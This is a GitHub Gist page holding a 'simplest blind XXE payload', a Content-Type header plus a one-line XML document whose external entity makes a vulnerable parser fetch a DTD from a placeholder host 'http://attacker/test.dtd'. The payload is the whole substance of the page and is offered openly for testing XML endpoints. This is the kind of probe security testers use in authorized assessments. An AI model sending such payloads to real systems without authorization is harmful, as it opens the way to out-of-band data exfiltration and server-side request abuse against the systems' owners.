Created
April 25, 2017 11:35
-
-
Save mgeeky/cf677de6e7fdc05803f6935de1ee0882 to your computer and use it in GitHub Desktop.
Simplest Blind XXE Payload to test within HTML request
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Content-Type: text/xml | |
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment